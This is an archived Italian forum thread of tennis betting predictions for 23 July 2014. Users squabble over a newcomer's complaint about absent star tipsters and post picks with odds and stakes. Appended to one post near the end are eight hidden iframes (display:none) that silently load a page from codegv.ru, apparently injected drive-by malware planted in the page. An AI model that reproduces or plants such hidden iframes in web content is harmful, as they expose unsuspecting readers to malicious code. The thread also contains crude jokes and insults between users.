PDA

Visualizza versione completa : Pronostici Tennis 23 Luglio



henaro
23-07-2014, 05.06.07
Questo thread e diventato una vergogna.Senza Noah,Caretto,ignorante e pochi altri e' veramente penoso.Non sono native italian percio vi chiedo scusa per il linguaggio,ma seguivo il forum piu di 5 anni e non ho visto una cosa del genere.Spero tutti stanno bene e alla spiaggia :)

Cmq andiamo avanti... :)

Guidoo
23-07-2014, 07.55.11
Questo thread e diventato una vergogna.Senza Noah,Caretto,ignorante e pochi altri e' veramente penoso.Non sono native italian percio vi chiedo scusa per il linguaggio,ma seguivo il forum piu di 5 anni e non ho visto una cosa del genere.Spero tutti stanno bene e alla spiaggia :)

Cmq andiamo avanti... :)

perchè invece di criticare non cominci a postare con idee e suggerimenti ed analisi?

dropshot
23-07-2014, 08.28.22
Questo thread e diventato una vergogna.Senza Noah,Caretto,ignorante e pochi altri e' veramente penoso.Non sono native italian percio vi chiedo scusa per il linguaggio,ma seguivo il forum piu di 5 anni e non ho visto una cosa del genere.Spero tutti stanno bene e alla spiaggia :)

Cmq andiamo avanti... :)

un altro disperato che non sa piu' dove copiare, comunque sono d'accordo con te inutile perder tempo a postare grazie per avermelo ricordato perchè ancora troppo spesso me lo dimentico e ci ricasco

alex93
23-07-2014, 08.37.22
La mancanza dei cosiddetti mostri sacri e' sicuramente una nota negativa.
Ma credo che tu ponga la questione in maniera un tantino offensiva per tutti quelli che postano i loro pronostici.
Credo che invece bisogna esortare i forumisti a formulare le loro disamine per poi prendere spunto per i propri prono.
Quindi io esorto tutti quelli che hanno delle idee sulle gare di postarle. Con tranquillità
lo spirito di questo forum deve essere amichevole e collaborativo

divin codino 1000
23-07-2014, 08.39.33
Questo thread e diventato una vergogna.Senza Noah,Caretto,ignorante e pochi altri e' veramente penoso.Non sono native italian percio vi chiedo scusa per il linguaggio,ma seguivo il forum piu di 5 anni e non ho visto una cosa del genere.Spero tutti stanno bene e alla spiaggia :)

Cmq andiamo avanti... :)


Certo che pretendere pronostici da chi dici tu,
e poi scrivere alla fine andiamo avanti mi fa davvero sorridere
è come se tua moglie ti dicesse che non sei Rocco Siffredi,
che quando stava con Rocco era molto meglio e bla bla bla,
e poi ti dicesse cmq se vuoi trombami pure, :lol:

tu che faresti ?

Paolo Raimondi
23-07-2014, 08.57.00
Come attenuante hai la non padronanza della lingua, forse non ti sei reso conto di quanto sei stato vergognoso tu...
(ovviamente è un quote al primo post)

Tonieland
23-07-2014, 09.04.28
ahahahahhah registrato dal 2008 e ha scritto il messaggio di presentazione e il messaggio qui in questo topic...2 messaggi in 6 anni...ahahahahhah

miglio
23-07-2014, 09.08.45
Certo che pretendere pronostici da chi dici tu,
e poi scrivere alla fine andiamo avanti mi fa davvero sorridere
è come se tua moglie ti dicesse che non sei Rocco Siffredi,
che quando stava con Rocco era molto meglio e bla bla bla,
e poi ti dicesse cmq se vuoi trombami pure, :lol:

tu che faresti ?:lol:

rinaldovick
23-07-2014, 11.01.58
Bellucci - Delbonis tie break nell'incontro @2.50 stake 3
tie break nel primo set @4.50 stake 1
Prendo questa giocata per questo match, dato che volevo prendere il brasiliano che qui a Gstaad ha fatto bene in passato, ma in questo momento non mi offre troppe garanzie. Precedenti sempre abbastanza combattuti e sopratutto qui in Svizzera la palla viaggia di più e credo che i set possano allungarsi. Stake basso

Challenger Tampere
Huta Galung - Lokoli 2@2.75 stake 2
Faccio un tentativo a stake basso sul francese. Lokoli, che ha impressionato al Roland, ha un ottimo servizio e una buona mano non dovrebbe aver problemi sulle palle tagliate in back che l'olandese gli andrà a proporre. Huta non brillantissimo nel periodo se non scende centrato in campo avrà secondo me grossi problemi.

Otello
23-07-2014, 11.18.03
Bellucci - Del Bonis

Anche se non sono uno dei mostri sacri citati sopra , cerco di postare qualche mia idea.....Quest'anno gia si sono incontrati per ben due volte , la vittoria del brasiliano e' avvenuta in quel di Monaco per 3 set , recentissima ; l'altra dell'argentino invece e' avvenuta proprio in casa del brasliano in quel di San Paolo e sempre per 3 set....Il brasiliano quest'anno vanta uno score di 19 vittorie e 14 sconfitte , dove il miglior risultato e' stato proprio a San Paolo dove arrivo' in semifinale (persa proprio contro Del Bonis ) ; mentre per l'argentino quest'anno lo score recita 21 vittorie e 13 sconfitte e all'attivo la vittoria del torneo di San paolo con una finale disputata in quel di Nizza , poi persa contro Gulbis.... in questo momento preferisco andare a favore del brasiliano che ieri ho visto molto solido al servizio e puo tranquillamente giocarsela contro l'argentino , come dimostrano i prcedenti.... quota oltre il raddoppio ottima.....

Bellucci @ 2.40 stake Medio
Over 22,5 Stake Alto

grillotalpa
23-07-2014, 11.39.36
ITF Germania : Jan Oliver Sadlowski @ 2.70
credo ci sia ancora valore anche se era uscita @6
tecnicamente non so fare un'analisi ma credo che i valori tra i due siano molto simili


Itf Italia Walter Trusendi @ 2.70
piccolo tentativo ma anche qui come sopra non trovo giustificata la forbice. Partita da 50/50 o quasi

sesio
23-07-2014, 12.27.04
Per oggi una doppia ITF femminile:

Balducci 2-0 itf viserba + Koch-Benvenuto 2-0 Itf Campos @1.90 stake 5

Balducci poco da dire, molto più forte e avanti 3-0 negli h2h sempre per 2 set a 0 (2 nel 2014)
Koch-Benvenuto divario molto ampio tra le due giocatrici vedo una vittoria facile

Tonieland
23-07-2014, 14.41.11
Andujar-Rola su terra a Gstaad

Andujar è dato nettamente favorito, ma un fenomeno non è, anzi...Rola nel periodo appare in buona forma, ha ottenuto anche buone vittorie contro avversari però non irresistibili...penso che la quota di Rola @2.8/@3 sia decisamente invitante, monitorerò live.

grillotalpa
23-07-2014, 15.45.21
ITF Germania : Jan Oliver Sadlowski @ 2.70
credo ci sia ancora valore anche se era uscita @6
tecnicamente non so fare un'analisi ma credo che i valori tra i due siano molto simili


Itf Italia Walter Trusendi @ 2.70
piccolo tentativo ma anche qui come sopra non trovo giustificata la forbice. Partita da 50/50 o quasi
malissimo

bobone
23-07-2014, 16.34.48
Solo ora sto leggendo ahahahha sembrate tutti dei bimbi.....
Però ora sono curioso e faccio una domanda

Ma sti "mostri sacri del tennis" perché non postano più?

A) sono stati criticati da qualche imbecille e hanno deciso di fare tipo uno sciopero di massa, però appena qualcuno chiede di loro riescono tutti fuori dal guscio scrivendo frasi Prandelliane come :"era impossibile continuare ed ho lasciato,perché non è bello quando ti dicono certe cose"...oppure rispondono "per colpa di gente come te"

B)son diventati tipster a pagamento

C)si sono stancati

D)per gente come me

Io cmq rimango del parere che è meglio un utente fantasma che nn posta nulla e segue in silenzio le bet altrui(magari perché non è un esperto di un determinato sport), che non un utente ignorante che critica un altro utente solo se l esito della scommessa è negativo.
Non voglio criticare ne attaccare nessuno però a volte anche i guru del forum hanno attaccato gente che postava le proprie idee...
Ora chiudo qua perché non sono un esperto massimo del tennis sperando che sti mostri sacri del tennis tornino e ci regalino le loro bet pronte da essere copiate e giocate e sperando che questa telenovela finisca.

gabriele111
23-07-2014, 19.17.19
aihmè sono divenuti tipster a pagamento..
carrettero vuole 800 euro al mese per una pick
noah ne vuole 900 perchè ha insegnato a carretero come si fa
iniorante invece ne vuole 700.. beati loro......

rinaldovick
23-07-2014, 19.33.33
Bellucci - Delbonis tie break nell'incontro @2.50 stake 3
tie break nel primo set @4.50 stake 1
Prendo questa giocata per questo match, dato che volevo prendere il brasiliano che qui a Gstaad ha fatto bene in passato, ma in questo momento non mi offre troppe garanzie. Precedenti sempre abbastanza combattuti e sopratutto qui in Svizzera la palla viaggia di più e credo che i set possano allungarsi. Stake basso

Challenger Tampere
Huta Galung - Lokoli 2@2.75 stake 2
Faccio un tentativo a stake basso sul francese. Lokoli, che ha impressionato al Roland, ha un ottimo servizio e una buona mano non dovrebbe aver problemi sulle palle tagliate in back che l'olandese gli andrà a proporre. Huta non brillantissimo nel periodo se non scende centrato in campo avrà secondo me grossi problemi.
Un vero peccato perchè Lokoli gioca un secondo e terzo set ottimi (anche se continua a giocare troppo difensivo e lontano dalla linea di fondo, oggi è andata bene, in futuro è lì che deve migliorare), mentre avevo in mente di bettare Bellucci vincente invece non mi fido e gioco una pessima bet..... Leggero passivo... -0.5

bobone
23-07-2014, 19.33.42
aihmè sono divenuti tipster a pagamento..
carrettero vuole 800 euro al mese per una pick
noah ne vuole 900 perchè ha insegnato a carretero come si fa
iniorante invece ne vuole 700.. beati loro......

Ah che peccato!!!!!........

rendall
23-07-2014, 20.09.12
Questo thread e diventato una vergogna.Senza Noah,Caretto,ignorante e pochi altri e' veramente penoso.Non sono native italian percio vi chiedo scusa per il linguaggio,ma seguivo il forum piu di 5 anni e non ho visto una cosa del genere.Spero tutti stanno bene e alla spiaggia :)

Cmq andiamo avanti... :)

da ottobre 2008 a luglio 2014 solo 2 messaggi... viva i parassiti. TU NON SEGUIVI IL FORUM COPIAVI E BASTA.

però lo storpiamento dei nick in "carretto" e "ignorante" è troppo lolloso. li non penso sia un problema di lingua :mia:

Tonieland
23-07-2014, 20.28.17
Io non capisco come si faccia a scommettere osservando cosa fanno gli altri di nascosto...ma che gusto c'è?! anche perchè qua nessuno ha la palla di cristallo! non esiste il ragionamento "non ne capisco, ma seguo loro e faccio soldi!", pochi fanno soldi dalle bet. E' molto più interessante invece appassionarsi allo sport X in questione, provare un po' a seguirlo e cercare di esporre le proprie idee e i conseguenti pronostici. Magari si sbaglia, ma tanto se si segue il pronostico Y di Tonieland o di altri bravi utenti la possibilità di perdere è sempre quella.
<iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

bobone
23-07-2014, 21.08.42
Io non capisco come si faccia a scommettere osservando cosa fanno gli altri di nascosto...ma che gusto c'è?! anche perchè qua nessuno ha la palla di cristallo! non esiste il ragionamento "non ne capisco, ma seguo loro e faccio soldi!", pochi fanno soldi dalle bet. E' molto più interessante invece appassionarsi allo sport X in questione, provare un po' a seguirlo e cercare di esporre le proprie idee e i conseguenti pronostici. Magari si sbaglia, ma tanto se si segue il pronostico Y di Tonieland o di altri bravi utenti la possibilità di perdere è sempre quella.


Boh magari vedono il profit postato in firma e non hanno voglia di perdere tempo nell'appassionarsi ad uno sport, in poche parole vogliono la pappa già bella che pronta

sesio
23-07-2014, 22.54.51
Per oggi una doppia ITF femminile:

Balducci 2-0 itf viserba + Koch-Benvenuto 2-0 Itf Campos @1.90 stake 5

Balducci poco da dire, molto più forte e avanti 3-0 negli h2h sempre per 2 set a 0 (2 nel 2014)
Koch-Benvenuto divario molto ampio tra le due giocatrici vedo una vittoria facile

Incredibilmente non va! Benvenuto fa il suo dovere... Balducci si dimentica di giocare nel primo set e lo perde poi spazza via l avversaria e vince facile

gabriele111
24-07-2014, 07.31.59
Ho le lacrime :)

dropshot
24-07-2014, 08.40.33
Ho le lacrime :)

:mia:

Otello
24-07-2014, 10.12.59
Bellucci - Del Bonis

Anche se non sono uno dei mostri sacri citati sopra , cerco di postare qualche mia idea.....Quest'anno gia si sono incontrati per ben due volte , la vittoria del brasiliano e' avvenuta in quel di Monaco per 3 set , recentissima ; l'altra dell'argentino invece e' avvenuta proprio in casa del brasliano in quel di San Paolo e sempre per 3 set....Il brasiliano quest'anno vanta uno score di 19 vittorie e 14 sconfitte , dove il miglior risultato e' stato proprio a San Paolo dove arrivo' in semifinale (persa proprio contro Del Bonis ) ; mentre per l'argentino quest'anno lo score recita 21 vittorie e 13 sconfitte e all'attivo la vittoria del torneo di San paolo con una finale disputata in quel di Nizza , poi persa contro Gulbis.... in questo momento preferisco andare a favore del brasiliano che ieri ho visto molto solido al servizio e puo tranquillamente giocarsela contro l'argentino , come dimostrano i prcedenti.... quota oltre il raddoppio ottima.....

Bellucci @ 2.40 stake Medio
Over 22,5 Stake Alto


Non saro' un mostro sacro :lol: ma ogni tanto c ' azzecco :lol: ....:asd: